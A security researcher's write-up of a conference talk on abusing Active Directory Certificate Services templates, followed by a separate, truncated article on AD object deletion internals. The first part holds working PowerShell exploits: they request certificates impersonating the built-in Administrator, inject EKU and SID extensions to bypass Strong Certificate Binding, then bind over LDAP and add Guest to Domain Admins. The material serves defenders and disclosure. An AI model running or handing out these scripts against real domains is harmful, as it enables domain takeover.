Last week I presented my session “When your Enterprise PKI becomes one of your enemies” at the Hybrid Identity Protection (HIP) Conference 2024 in New Orleans. Thanks to all who attended my session, and for all of the follow-up questions I got later during the conference and now also on social media and e-mail. I’m very sorry that my last two demos didn’t work; the reason was an issue with the CDP in my demo environment – the KDC didn’t consider its own certificate valid for PKINIT, hence the problem.
The first part of the presentation outlined something very common and dangerous that we already see today: Enterprise CAs trusted for authentication against Active Directory publishing certificate templates that allow the subject to be supplied in the request (SITR).
But how can you determine if a CA is trusted for authentication against Active Directory? Either the CA is trusted in NTAuth, and the leaf certificates and KDC certificates have their full chain trusted and valid – this allows for implicit/explicit UPN mapping, e.g. the SAN in the certificate matches the userPrincipalName attribute of the user within Active Directory. Or, if the CA is not trusted in NTAuth, only explicit mapping is available using the altSecurityIdentities attribute – again provided the leaf certificates and KDC certificates have their full chain trusted and valid.
By default, if you install an Enterprise CA using Active Directory Certificate Services (AD CS), it will be trusted in NTAuth.
Above you can see the requirements to be trusted to authenticate to Active Directory using certificates. Note that Schannel in the S4U2Self scenarios involves the KDC, and that the authentication part maps to either NTAuth (implicit mapping) or AltSecID (explicit mapping).
The methods in blue are required to be considered strong according to Strong Certificate Binding Enforcement (more on that later).
Active Directory: So let’s have a look at NTAuth. CAs trusted in NTAuth are stored at the following location in Active Directory: ‘CN=NTAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration,DC=X’, with their certificates in the multi-valued attribute ‘cACertificate’.
Clients: On every domain-joined computer, a copy of all the trusted CAs in the above attribute is stored in the registry at the following location: ‘HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\NTAuth\Certificates’, where one key is created for each CA, named after the thumbprint of the CA certificate.
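The registry key name is simply the SHA-1 thumbprint of the CA certificate in upper-case hex. As a small illustration (plain Python rather than the PowerShell used elsewhere in this post; the input here is dummy bytes, a real input would be the DER-encoded certificate from the ‘cACertificate’ attribute):

```python
import hashlib

def ntauth_registry_key_name(der_bytes: bytes) -> str:
    """Derive the key name used under
    HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\NTAuth\\Certificates:
    the SHA-1 thumbprint of the CA certificate, upper-case hex."""
    return hashlib.sha1(der_bytes).hexdigest().upper()

# Dummy input for illustration only:
print(ntauth_registry_key_name(b"dummy certificate bytes"))
```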
Group Policy: The Autoenrollment Client Side Extension (CSE) is supposed to cache the content from AD to the registry on each domain-joined machine within the forest (including DCs).
So who is validating that the CA is trusted in NTAuth?
Domain Controllers / KDC (if not explicit mapping using AltSecID)
Network Policy Server (NPS)
LDAP-STARTTLS
IIS – SCHANNEL
ADFS – SCHANNEL (Even if an explicit mapping exists using AltSecID)
Enrollment of templates that have private key archival enabled
So how is the validation that the CA is trusted in NTAuth performed? If we’re online, we’re taking a trip to ‘CN=NTAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration,DC=X’ using LDAP, right?
Nope – verification is done using an API: we’re calling into crypt32.dll!CertVerifyCertificateChainPolicy with the ‘CERT_CHAIN_POLICY_NT_AUTH’ policy.
Note: You can test this using PowerShell: Test-Certificate -Cert $cert -Policy NTAUTH
First, the certificate chain is validated from the leaf certificate up to the root CA certificate, and the full chain must be trusted.
Then it verifies that the CA directly above the leaf certificate is trusted in NTAuth. This check is done locally by looking in the registry on the client (‘HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\NTAuth\Certificates’) – the API never asks Active Directory.
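The two checks above can be sketched as a toy model – illustrative Python, not the real crypt32 implementation:

```python
# Toy model of the CERT_CHAIN_POLICY_NT_AUTH check described above.
def nt_auth_policy_check(chain, local_ntauth_thumbprints):
    # The chain (leaf first, root last) must be valid and fully trusted.
    if not chain["valid_and_trusted"]:
        return False
    # The CA directly above the leaf must be in the locally cached
    # NTAuth store (the registry copy -- AD is never queried).
    issuing_ca_thumbprint = chain["certs"][1]
    return issuing_ca_thumbprint in local_ntauth_thumbprints

chain = {"valid_and_trusted": True, "certs": ["LEAF", "CA1", "ROOT"]}
print(nt_auth_policy_check(chain, {"CA1"}))   # True: issuing CA cached
print(nt_auth_policy_check(chain, {"ROOT"}))  # False: only root cached
```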
What is Strong Certificate Binding Enforcement? Strong Certificate Binding is a response to CVE-2022-34691, CVE-2022-26931 and CVE-2022-26923, which address an elevation of privilege vulnerability that can occur when the Kerberos Key Distribution Center (KDC) is servicing a certificate-based authentication request. Before the May 10, 2022 security update, certificate-based authentication would not account for a dollar sign ($) at the end of a machine name. This allowed related certificates to be emulated (spoofed) in various ways. Additionally, conflicts between User Principal Names (UPNs) and sAMAccountName introduced other emulation (spoofing) vulnerabilities that are also addressed by this security update. More information can be found here: KB5014754: Certificate-based authentication changes on Windows domain controllers, and here: Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923) | by Oliver Lyak | IFCR
Specifically, this protects against the following four scenarios:
dNSHostName/servicePrincipalName computer owner abuse: remove the DNS SPNs from servicePrincipalName, steal the DNS hostname of a DC by putting it in your computer account’s dNSHostName attribute, request a certificate, authenticate with that certificate – and you’re a DC.
Overwrite the userPrincipalName of a user to be the name of the target (without the domain part) to hijack the user account, since the missing domain part does not conflict with an existing UPN.
Overwrite the userPrincipalName of a user to be ‘<machine account>@<domain>’ of the target to hijack a machine account, since machine accounts don’t have a UPN.
Delete the userPrincipalName of a user and overwrite sAMAccountName to be that of a machine account without the trailing $ to hijack the machine account.
Note: scenarios 2–4 would require permissions to write to the ‘userPrincipalName’ attribute.
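To make scenario 4 concrete, here is a toy model (illustrative Python – the real logic lives in the KDC) of how, before the May 2022 updates, a failed account lookup could fall through to a retry with a trailing ‘$’ and land on a machine account:

```python
# Hypothetical account database for illustration.
accounts = {"jdoe": "user", "DC01$": "machine (domain controller)"}

def kdc_map_account(cert_name):
    """Toy model: if no account matches the certificate name exactly,
    the pre-update KDC would retry with a trailing '$', which could
    land on a real machine account."""
    if cert_name in accounts:
        return cert_name
    if cert_name + "$" in accounts:
        return cert_name + "$"
    return None

# An attacker sets their own account's sAMAccountName to 'DC01'
# (no trailing $), enrolls a certificate, then renames it back:
print(kdc_map_account("DC01"))  # maps to the real DC's machine account
```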
So how is Strong Certificate Binding Enforcement implemented?
As outlined in KB5014754: Certificate-based authentication changes on Windows domain controllers, once we’re in Full Enforcement mode there are only three ways to stay compliant – otherwise certificate-based authentication is going to fail against Active Directory. Full Enforcement mode is planned to become the default on February 11, 2025, with an option to opt out until September 10, 2025 by explicitly configuring your domain controllers to be in Compatibility mode. But if you have not already rolled into Enforcement mode yourself, it means your Active Directory is still vulnerable to those CVEs.
Options to be compliant with Strong Certificate Binding Enforcement

Method: Certificate SID Extension
Requirements: The certificate must contain the ‘1.3.6.1.4.1.311.25.2’ SID extension, which encodes the SID of the user or computer that the certificate is issued for/to be used for authentication with.
Certificate re-issue required: Yes

Method: SAN URL
Requirements: The SAN of the certificate must contain one entry of type URL with a value of “tag:microsoft.com,2022-09-14:sid:<value>”, where <value> is the SID of the user or computer that the certificate is issued for/to be used for authentication with. This is only accepted by the KDC on Windows Server 2019 through Windows Server 2025 DCs.
Certificate re-issue required: Yes

Method: AltSecID
Requirements: Use the ‘altSecurityIdentities’ attribute to strongly map the certificate to the user or computer the certificate is issued for/to be used for authentication with. Only the following mapping methods are considered strong:
– X509IssuerSerialNumber: “X509:<I>IssuerName<SR>1234567890”
– X509SKI: “X509:<SKI>123456789abcdef”
– X509SHA1PublicKey: “X509:<SHA1-PUKEY>123456789abcdef”
Certificate re-issue required: No
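As a hedged illustration of the AltSecID issuer/serial format above (Python; note that KB5014754 specifies the serial number in the mapping string must be byte-reversed compared to how certificate tooling usually displays it – the issuer and serial values below are made up for the example):

```python
def reverse_serial(serial_hex: str) -> str:
    """Byte-reverse a certificate serial number, as required for the
    X509IssuerSerialNumber strong mapping in altSecurityIdentities."""
    s = serial_hex.replace(" ", "")
    return "".join(s[i:i + 2] for i in range(len(s) - 2, -1, -2))

def issuer_serial_mapping(issuer: str, serial_hex: str) -> str:
    """Build the X509IssuerSerialNumber mapping string."""
    return f"X509:<I>{issuer}<SR>{reverse_serial(serial_hex)}"

# Hypothetical issuer/serial values for illustration:
print(issuer_serial_mapping("DC=com,DC=contoso,CN=CONTOSO-DC-CA",
                            "2B0000000011AC0000000012"))
```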
Supply in the request (SITR) without Client Authentication EKU in the template
One of the requirements for the KDC to accept a certificate for authentication using PKINIT is that the EKU contains either Client Authentication (1.3.6.1.5.5.7.3.2), id-pkinit-KPClientAuth (1.3.6.1.5.2.3.4) or Smart Card Logon (1.3.6.1.4.1.311.20.2.2).
Microsoft has a proprietary extension called a Certificate Application Policy, and it’s used as an EKU. It is defined by the “msPKI-Certificate-Application-Policy” attribute on certificate templates. As this attribute isn’t populated (is empty) on v1 certificate templates, the application policy can be supplied in the request exactly the same way as we could supply a SAN.
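A hedged sketch of how you could audit for this condition – illustrative Python over template attributes you would fetch yourself via LDAP; the attribute name and OIDs are real, the template data here is made up:

```python
PKINIT_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # id-pkinit-KPClientAuth
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
}

def eku_suppliable_in_request(template: dict) -> bool:
    """If msPKI-Certificate-Application-Policy is absent or empty, the
    application policies (treated as EKUs) can be supplied by the
    requester -- regardless of template version."""
    return not template.get("msPKI-Certificate-Application-Policy")

templates = [
    {"name": "WebServer", "msPKI-Certificate-Application-Policy": []},
    {"name": "User",
     "msPKI-Certificate-Application-Policy": ["1.3.6.1.5.5.7.3.2"]},
]
for t in templates:
    print(t["name"], eku_suppliable_in_request(t))
```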
Microsoft issued a statement on this just the day before my presentation at the Hybrid Identity Protection (HIP) Conference 2024 in New Orleans. The statement from MSRC can be found here: Active Directory Certificate Services Elevation of Privilege Vulnerability – CVE-2024-49019. But it’s not telling you the entire truth about how this works. As far as I can see, this has nothing to do with whether the template is v1 or not; it has to do with, and only with, whether the “msPKI-Certificate-Application-Policy” attribute is populated or not. If you copy a v1 template – let’s say you copy the default ‘WebServer’ template – it’s upgraded, the values in ‘pKIExtendedKeyUsage’ are copied by the ‘Certificate Templates’ MMC into ‘msPKI-Certificate-Application-Policy’, and you’re safe. So what is not being told here:
If you have, let’s say, a v2 template and don’t define EKUs, or have msPKI-Certificate-Application-Policy empty, you’re just as subject to having EKUs supplied in the request – and this is regardless of template version. Are there any real-world scenarios for this? Well, here is an example of a vendor who guides certificate templates to be created this way: Create and Add a Microsoft Certificate Authority Template
Let’s try using this by showing some sample code. For this to work we assume that the default template ‘WebServer’ is published at an Enterprise CA named ‘nttest-ca-01.nttest.chrisse.com\Chrisse Issuing CA 1’, that the CA is trusted in NTAuth in a forest with a root domain named nttest.chrisse.com, and that the built-in administrator account exists by its default name. To utilize this, enrollment permissions need to be granted to either a user or a computer within the forest.
1. WebServer-AppPolicy.ps1
Import-Module -Name CertRequestTools
# CA1 is trusted in NTAuth
$CA1 = "nttest-ca-01.nttest.chrisse.com\Chrisse Issuing CA 1"
$ApplicationPoliciesExtension = New-Object -ComObject X509Enrollment.CX509ExtensionMSApplicationPolicies
$ApplicationPolicyOids = New-Object -ComObject X509Enrollment.CCertificatePolicies.1
$ApplicationPolicyOid = New-Object -ComObject X509Enrollment.CObjectId
$ApplicationPolicyOid.InitializeFromValue('1.3.6.1.5.5.7.3.2') # Client Authentication EKU
$CertificatePolicy = New-Object -ComObject X509Enrollment.CCertificatePolicy
$CertificatePolicy.Initialize($ApplicationPolicyOid)
$ApplicationPolicyOids.Add($CertificatePolicy)
$ApplicationPoliciesExtension.InitializeEncode($ApplicationPolicyOids)
$ManagedApplicationPoliciesExtension = [System.Security.Cryptography.X509Certificates.X509Extension]::new(
    $ApplicationPoliciesExtension.ObjectId.Value,
    [Convert]::FromBase64String($ApplicationPoliciesExtension.RawData(1)),
    $ApplicationPoliciesExtension.Critical)
New-PrivateKey -RsaKeySize 2048 -KeyName ([Guid]::NewGuid()) |
    New-CertificateRequest -Subject "CN=DEMO1" `
        -UserPrincipalName administrator@nttest.chrisse.com `
        -OtherExtension $ManagedApplicationPoliciesExtension |
    Submit-CertificateRequest -ConfigString $CA1 -Template WebServer |
    Install-Certificate -Name My -Location CurrentUser
So now we have a certificate with the UPN of the built-in administrator (RID 500), and we supplied the required Client Authentication EKU in the request using the ‘WebServer’ template – so our certificate with the subject “CN=DEMO1” should be able to authenticate and become the Administrator account (RID 500). To do this we use another script to perform LDAP-STARTTLS – select the certificate issued by the previous script when prompted. Note: change the domain controller from ‘nttest-dc-01.nttest.chrisse.com’ to your own DC; the KDC on the DC must be capable of performing PKINIT, e.g. have a valid KDC certificate.
LDAP-TLSv2.ps1
Add-Type -AssemblyName System.DirectoryServices.Protocols
Add-Type -AssemblyName System.Security
# Change the domain controller to your own DC instead of 'nttest-dc-01.nttest.chrisse.com'
$Id = New-Object -TypeName System.DirectoryServices.Protocols.LdapDirectoryIdentifier -ArgumentList 'nttest-dc-01.nttest.chrisse.com',389,$true,$false
$Ldap = New-Object -TypeName System.DirectoryServices.Protocols.LdapConnection -ArgumentList $Id,$null,([System.DirectoryServices.Protocols.AuthType]::External)
$Ldap.AutoBind = $false
"Certificate selection" | Write-Host
$Location = [System.Security.Cryptography.X509Certificates.StoreLocation]::CurrentUser
$Name = [System.Security.Cryptography.X509Certificates.StoreName]::My
$Store = New-Object -TypeName System.Security.Cryptography.X509Certificates.X509Store -ArgumentList $Name,$Location
$Store.Open("ReadOnly, MaxAllowed, OpenExistingOnly")
$Cert = [System.Security.Cryptography.X509Certificates.X509Certificate2UI]::SelectFromCollection($Store.Certificates.Find("FindByKeyUsage",0xa0,$true).Find("FindByExtension","2.5.29.35",$true),"Certificate selection","Select a certificate","SingleSelection")
$Store.Dispose()
$Ldap.ClientCertificates.Clear()
[void]$Ldap.ClientCertificates.Add($Cert[0])
$Ldap.SessionOptions.QueryClientCertificate = {
    param(
        [System.DirectoryServices.Protocols.LdapConnection] $Connection,
        [Byte[][]] $TrustedCAs
    )
    return $Cert[0]
}
"Starting TLS" | Write-Host
$Ldap.SessionOptions.StartTransportLayerSecurity($null)
$RootDseSearchRequest = New-Object -TypeName System.DirectoryServices.Protocols.SearchRequest -ArgumentList '',"(&(objectClass=*))","Base"
Try {
    $RootDseSearchResponse = $null
    $RootDseSearchResponse = $Ldap.SendRequest($RootDseSearchRequest)
}
Catch {
    $Ldap.Dispose()
    throw $_
}
"Default naming context: {0}" -f $RootDseSearchResponse.Entries[0].Attributes["defaultNamingContext"].GetValues([String])
"Binding" | Write-Host
Try {
    $Ldap.Bind()
}
Catch {
    throw
}
# Send an Extended WHOAMI request
$ExtReq = New-Object -TypeName System.DirectoryServices.Protocols.ExtendedRequest -ArgumentList "1.3.6.1.4.1.4203.1.11.3"
$ExtRes = [System.DirectoryServices.Protocols.ExtendedResponse] $Ldap.SendRequest($ExtReq)
"Bound as identity: '{0}'" -f [System.Text.Encoding]::UTF8.GetString($ExtRes.ResponseValue)
# Change to a user you want to add to Domain Admins
$UserDN = "CN=Guest,CN=Users,DC=nttest,DC=chrisse,DC=com"
"Adding '{0}' to Domain Admins" -f $UserDN
$Modify = [System.DirectoryServices.Protocols.ModifyRequest]::new("CN=Domain Admins,CN=Users,DC=nttest,DC=chrisse,DC=com","Add","member",$UserDN)
Try {
    $Response = $Ldap.SendRequest($Modify)
}
Catch {
    $Response = $_.Exception.GetBaseException().Response
}
"Result: {0}" -f $Response.ResultCode
$Ldap.Dispose()
Supply in the request (SITR) with Strong Certificate Binding Enforcement
If we now enable Strong Certificate Binding Enforcement on our KDCs / Domain Controllers by creating the registry value “HKLM\SYSTEM\CurrentControlSet\Services\Kdc\StrongCertificateBindingEnforcement” as type DWORD and setting it to “2”, Strong Certificate Binding Enforcement is enabled.
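For reference, the three values of StrongCertificateBindingEnforcement per KB5014754, sketched as a Python lookup (consult the KB itself for the current guidance):

```python
# Meaning of the StrongCertificateBindingEnforcement DWORD values.
STRONG_BINDING_MODES = {
    0: "Disabled - no strong certificate mapping check",
    1: "Compatibility mode - weakly mapped authentications are "
       "allowed and logged",
    2: "Full Enforcement mode - authentication fails unless the "
       "certificate is strongly mapped",
}

for value, meaning in sorted(STRONG_BINDING_MODES.items()):
    print(value, meaning)
```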
We can verify this by trying to authenticate with the certificate already issued above, with the subject CN=DEMO1 – simply run the LDAP-STARTTLS script and select the certificate issued by the previous script when prompted.
This time the authentication should fail. This is expected, as the certificate is not compliant with Strong Certificate Binding Enforcement: it doesn’t contain the SID extension or a SAN with the SID, and it is not explicitly mapped in the altSecurityIdentities attribute.
So this means that once we reach Strong Certificate Binding Enforcement on all our KDCs / Domain Controllers, we’re safe from this supply-in-the-request madness, right? Absolutely not. Because what if the SID extension could also be supplied in the request?
Let’s issue a certificate once again using the same template ‘WebServer’ but supply a SID as well.
2. WebServer-AppPolicySCBE.ps1
Import-Module -Name CertRequestTools
# CA1 is trusted in NTAuth
$CA1 = "nttest-ca-01.nttest.chrisse.com\Chrisse Issuing CA 1"
# Insert the SID as szOID_NTDS_CA_SECURITY_EXT certificate extension
$SidExtension = New-SidExtension -NTAccount NTTEST\Administrator
$ApplicationPoliciesExtension = New-Object -ComObject X509Enrollment.CX509ExtensionMSApplicationPolicies
$ApplicationPolicyOids = New-Object -ComObject X509Enrollment.CCertificatePolicies.1
$ApplicationPolicyOid = New-Object -ComObject X509Enrollment.CObjectId
$ApplicationPolicyOid.InitializeFromValue('1.3.6.1.5.5.7.3.2') # Client Authentication EKU
$CertificatePolicy = New-Object -ComObject X509Enrollment.CCertificatePolicy
$CertificatePolicy.Initialize($ApplicationPolicyOid)
$ApplicationPolicyOids.Add($CertificatePolicy)
$ApplicationPoliciesExtension.InitializeEncode($ApplicationPolicyOids)
$ManagedApplicationPoliciesExtension = [System.Security.Cryptography.X509Certificates.X509Extension]::new(
    $ApplicationPoliciesExtension.ObjectId.Value,
    [Convert]::FromBase64String($ApplicationPoliciesExtension.RawData(1)),
    $ApplicationPoliciesExtension.Critical)
New-PrivateKey -RsaKeySize 2048 -KeyName ([Guid]::NewGuid()) |
    New-CertificateRequest -Subject "CN=DEMO2" `
        -UserPrincipalName administrator@nttest.chrisse.com `
        -OtherExtension $SidExtension,$ManagedApplicationPoliciesExtension |
    Submit-CertificateRequest -ConfigString $CA1 -Template WebServer |
    Install-Certificate -Name My -Location CurrentUser
Now you should have an issued certificate with the subject “CN=DEMO2”. Use the LDAP-STARTTLS script again to authenticate with the new certificate – make sure you select the right certificate; if you want to be sure, you can just open certmgr.msc and delete “CN=DEMO1”.
You should now have been authenticated – even though the KDC / Domain Controller is in Strong Certificate Binding Enforcement mode.
To wrap up this first blog post – an attempt to cover what was presented in the first part of my session “When your Enterprise PKI becomes one of your enemies” at the Hybrid Identity Protection (HIP) Conference 2024 in New Orleans last week – there are some key takeaways.
“Strong Certificate Binding Enforcement” will not help you with bad certificate template hygiene at all; it was designed to prevent CVE-2022-34691, CVE-2022-26931 and CVE-2022-26923.
Certificate templates without the ‘msPKI-Certificate-Application-Policy’ attribute populated are subject to EKUs being supplied in the request, regardless of template version.
Equally, certificate templates with at least one EKU in ‘msPKI-Certificate-Application-Policy’ are protected. (You can patch the default v1 ‘WebServer’ template if you want – I’m not in any way recommending the use of v1 templates.)
The next part will look into how all this can be mitigated by choosing the right design and how templates can be optimally configured – but after that, I’m going to cover some of the really bad scenarios.
How deletion/removal of data really works in Active Directory

This is the fourth post in a series of articles that describe what’s really inside NTDS.dit and how Active Directory works at the database layer. The past three articles have been about:
Explains the tables within NTDS.dit in detail: what they are used for, in which release of Active Directory (Windows Server) they were introduced, as well as any major changes added in later versions: How the Active Directory – Data Store Really Works (Inside NTDS.dit) – Part 1
Explains how the object tree hierarchy is maintained at the database layer, the concept of DNTs and PDNTs, and how they make up the relation between parent and descendant objects: How the Active Directory – Data Store Really Works (Inside NTDS.dit) – Part 2
Explains the “Ancestors_col” that supports subtree searches and the security propagation (SDProp) – Part 3
This blog article will not cover the following scenarios:
Deletions of DSAs (Domain Controllers), because they involve SAM and NETLOGON.
The Foreign-Security-Principal cleanup task, as it cleans up and removes duplicate SIDs that can only end up in your directory in very rare scenarios and involves SAM-to-AD upgrades.
This blog article wouldn’t have been possible without:
The ESEDump utility that I’ve developed together with my very good friend Stanimir Stoyanov – his contribution to the code has been invaluable.
Countless sleepless nights and the support from my team at Enfo Zipper.
What you need as prerequisites before reading this blog article:
Basic understanding of Active Directory at the database layer, that can be found at this blog:
Basic understanding of deletions in Active Directory
When an object is deleted in Active Directory (this is referred to as a logical deletion), the object is not immediately removed from Active Directory. Instead, the object is flagged/marked for deletion by setting two or three attributes on it, depending on whether the Active Directory “Recycle Bin” feature is enabled and whether there are Windows Server 2008 R2 or later DSAs hosting a writeable instance of the object – see ‘Table 1’.
There are a few exceptions where objects are physically deleted immediately (the row representing the object is deleted from the database) without ever transiting through the intermediate states of tombstone, deleted object or recycled object:
Dynamic objects, i.e. objects that have the auxiliary class dynamicObject present – those are physically removed once their time-to-live has passed; they may remain as phantoms in the database until all references pointing towards them have been cleared.
Placeholder objects that are in the distribution NTDS.dit – deleted by DCPROMO.
A read-only naming context (NC) is being removed from a replica (e.g. a Global Catalog (GC) demotion)
Removal of lingering objects – using the operational attribute ‘removeLingeringObject’: http://msdn.microsoft.com/en-us/library/cc223303(v=prot.10).
Removal of an object as a result of being cross-domain moved.
Table 1: Logical deletion sets the following attributes

Attributes: isDeleted, lastKnownParent
Recycle Bin state: Off
Minimum DSA versions present: Windows 2000 Server (all versions), Windows Server 2008 (all versions), Windows Server 2008 R2 – Read Only DC**, Windows Server 2012 – Read Only DC**

Attributes: isDeleted, isRecycled, lastKnownParent
Recycle Bin state: Off
Minimum DSA versions present: Windows Server 2008 R2 (all versions) – writable DC, Windows Server 2012 (all versions) – writable DC

Attributes: isDeleted, lastKnownParent, msDS-LastKnownRDN
Recycle Bin state: On
Minimum DSA versions present: Windows Server 2008 R2 (all versions), Windows Server 2012 (all versions)

** Originating deletions on an RODC of objects that are writable there, such as “Connection Objects”, set “isRecycled” as well.
Once objects are logically deleted and transformed into tombstones, they lose most of their attributes – unless the Recycle Bin is enabled, in which case a logical deletion transforms the object into a “deleted object” rather than a tombstone.
The following attributes are always preserved during a logical delete, regardless of the state of the Recycle Bin, until the object (row in the database) is either:

Physically deleted – the object isn’t referenced by any other object within the database, so the row representing the object can safely be deleted.

Turned into a phantom – the object (row) remains represented as a phantom to satisfy referential integrity, i.e. other objects (rows) in the database reference the object and prevent the row from being physically deleted. Please see Phantoms and reference integrity below.
Additionally, the attribute that serves as the RDN of the object being logically deleted is always preserved (e.g. CN/O/OU/DC).
Attributes that are defined in the schema to be preserved on deletion, by having their searchFlags attribute contain bit 8 (0x00000008 = fPRESERVEONDELETE), are also preserved during a logical delete – unless they are linked attributes, or constructed attributes that derive their data from an attribute that is not preserved.
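The searchFlags test is a simple bit check; a minimal illustration in Python (the bit value is from the text above):

```python
fPRESERVEONDELETE = 0x00000008

def preserved_on_delete(search_flags: int) -> bool:
    """True if the schema marks this attribute to be kept on logical
    deletion (bit 0x8 of searchFlags)."""
    return bool(search_flags & fPRESERVEONDELETE)

print(preserved_on_delete(0x8))        # True
print(preserved_on_delete(0x1 | 0x2))  # False
```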
Linked attributes (both forward links and backlinks) are removed on logical deletions, unless the Recycle Bin is enabled, in which case the links are deactivated instead.
To view deactivated links above the database layer when the Recycle Bin is enabled, the following control can be used:

Table 2: LDAP controls to make deactivated links visible to LDAP

Control name: LDAP_SERVER_SHOW_DEACTIVATED_LINK_OID
Visible when control present: Link values referring to deleted objects
Note: See ‘The removal of linked attribute values’ below for the behavior when a link value is removed directly, rather than as part of a logical deletion.
The following attributes will always be removed during a logical delete, regardless of searchFlags (0x00000008 = preserve on delete) and regardless of the Recycle Bin state.
During re-animation or undelete (if not supplied by the end user), objectCategory is derived back and set to the objectCategory of the object’s most specific objectClass.
If the object is a user, this is computed back to its original state using the userAccountControl attribute.
If the object is a group, this is computed back to its original state by using the groupType attribute.
Logical Deletion introduces the following internal columns to the database (NTDS.dit)
The following ‘internal’ columns (internal to the DSA only; they are not real attributes), together with the attributes set in Table 1: ‘Logical deletion sets the following attributes’, represent the database-level support for logical deletions of objects.
Table 3: datatable – Simplified for logical deletion
The ‘time_col’ is the column that holds the time of when an object was converted into a tombstone or deleted object.
‘time_col’ is not accessible through any external interfaces such as LDAP or ADSI – however, the metadata for the attribute ‘isDeleted’ should have an ‘Org.Time/Date’ that matches the value stored in the ‘time_col’ column.
The ‘recycle_time_col’ is the column that holds the time of when an object was logically deleted or, if the Recycle Bin is enabled, converted into a recycled object.
‘recycle_time_col’ is not accessible through any external interfaces such as LDAP or ADSI – however, the metadata for the attribute ‘isRecycled’ should have an ‘Org.Time/Date’ that matches the value stored in the ‘recycle_time_col’ column.
Note: Only present in Windows Server 2008 R2 databases and later
Sample NTDS.dit representing the state of a logically deleted object:
Once the deleted object lifetime (DOL) has passed since the object was logically deleted, ‘recycle_time_col’ and ‘isRecycled’ will be set. See ‘Deleted objects lifetime and deleted objects’ below for more information.
Originating logical deletion constraints
The object has to reside in a writable naming context (NC) on the DSA where the logical deletion originates.
If the object being deleted has the following characteristics within its Security Descriptor:
More exactly, when the Sbz1 field has the value 0x1 and the Control (RM Control) field has the SECURITY_PRIVATE_OBJECT bit (0x1) set, and the object being deleted resides within the schema naming context (NC) or the configuration naming context (NC), the following conditions have to be met:
The Domain Controller (DC) (where the originated delete is taking place) must be a member of the root domain in the forest, or
The Domain Controller (DC) (where the originated delete is taking place) must be a member of the same domain where the current object owner belongs.
If the FLAG_DISALLOW_DELETE bit is set in the ‘systemFlags’ attribute of the object being deleted, the delete is rejected by the DSA.
If the object being deleted is a tombstone, i.e. has the ‘isDeleted’ attribute set to True, and the Recycle Bin isn’t enabled, the delete is rejected by the DSA.
If the object being deleted is recycled, i.e. has the ‘isRecycled’ attribute set to True, and the Recycle Bin is enabled, the delete is rejected by the DSA.
If the object being deleted has descendants/child objects, the delete operation is rejected by the DSA unless the requester has passed the LDAP_SERVER_TREE_DELETE_OID control. The following constraints apply to tree-deletes as well:
The requester must have the RIGHT_DS_DELETE_TREE on the object being deleted. Note that no additional permissions are required on the descendants of the object.
The tree-delete operation cannot be applied to a naming context (NC) root.
Objects with the ‘isCriticalSystemObject’ attribute equal to True which are not Security Account Manager (SAM) specific objects cannot be deleted by the tree-delete operation. This constraint is checked object by object, and deletion stops at the first deletion attempt that violates the constraint. If deletion stops, the resultant tree might not be the same as the original tree, because some objects might have been deleted prior to the failure.
If the object being deleted resides within the schema naming context (NC) and the “Schema Devil” hasn’t been invoked, the delete is rejected by the DSA.
If the object being deleted is the DC’s nTDSDSA object (representing the DSA where the delete operation is taking place) or any of its ancestors, the delete is rejected by the DSA.
If the object being deleted is a crossRef object corresponding to the DC’s (the DSA where the delete operation is taking place) configuration, schema, or default domain naming contexts (NCs), the delete is rejected by the DSA.
If the object being deleted is protected, the delete is rejected by the DSA.
If the delete operation would require delayed link processing or link cleanup (please see the section below: The link cleaner and the delayed link processing mechanism) and such processing is already taking place on the object that is about to be deleted, the DSA may or may not proceed with the requested delete operation, depending on the following:
The DSA is running Windows Server 2008 R2 or later and is subject to “Delayed Link Processing”, and the object being deleted is already being processed by the “Delayed Link Processing” mechanism in such a way that the current processing can’t be merged with the requested operation (to remove forward or backward links associated with the object being deleted) – that is, if:
The ongoing link processing is performing any of the following operations:
Processing physical link deletions (can be merged with the delete operation if the Recycle Bin is absent; otherwise the delete is rejected by the DSA)
Processing logical link deletions (can be merged with the delete operation if the Recycle Bin is present; otherwise the delete is rejected by the DSA)
Processing logical link un-deletions (can’t be merged with the delete operation; the delete is rejected by the DSA)
Processing/touching metadata for a groupType change (can’t be merged with the delete operation; the delete is rejected by the DSA)
If the current operation implicitly forces processing on a specific attribute, a merge can only take place if the requested operation is about to perform processing on the same attribute; otherwise the delete is rejected by the DSA.
If the current operation implicitly forces processing bound to a specific update sequence number (USN), a merge can only take place if the requested operation is about to perform processing bound to the same USN; otherwise the delete is rejected by the DSA.
The DSA is running Windows Server 2003 or Windows Server 2008 and is therefore subject to the “Link Cleaner”. However, the Link Cleaner has the ability, for any object being processed, to determine the required work from the object’s current state (instead of from a work list). That is, if the delete operation requires processing (to remove forward or backward links associated with the object being deleted) and the object is already under link cleanup, the current link cleanup task will pick up the requirement just made by the delete operation.
The Deleted Objects (DO) containers
When an object is logically deleted, it is eventually moved into something referred to as the “Deleted Objects Container” (DO container). Every naming context (NC) in Active Directory has a deleted objects container by default, except the schema naming context (NC).
The deleted objects container(s) are not visible to ADSI or LDAP by default – however, they can be made visible to LDAP by specifying a server control. (The deleted objects container(s) are marked as deleted themselves by having the “isDeleted” attribute set to True, and are therefore invisible by default, like any other deleted object.)
The following controls make the deleted objects container(s), the deleted objects and eventually recycled objects visible.
Table 4: LDAP controls to make tombstones, deleted objects and recycled objects visible to LDAP
Control Name – Visible when control present
LDAP_SERVER_SHOW_DELETED_OID – Tombstones and Deleted Objects
LDAP_SERVER_SHOW_RECYCLED_OID – Tombstones, Deleted Objects and Recycled Objects
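As a rough sketch, here are the OIDs behind those two control names (the values are from MS-ADTS) and a small helper showing how a python-ldap-style client would attach one to a search. The `(oid, criticality, value)` triple shape is an assumption of that client style, not something AD defines:

```python
# OID constants for the two LDAP server controls described above (MS-ADTS).
LDAP_SERVER_SHOW_DELETED_OID = "1.2.840.113556.1.4.417"
LDAP_SERVER_SHOW_RECYCLED_OID = "1.2.840.113556.1.4.2064"

def tombstone_search_controls(include_recycled=False):
    """Pick the control that exposes tombstones/deleted objects, or the one
    that additionally exposes recycled objects; neither carries a value."""
    oid = (LDAP_SERVER_SHOW_RECYCLED_OID if include_recycled
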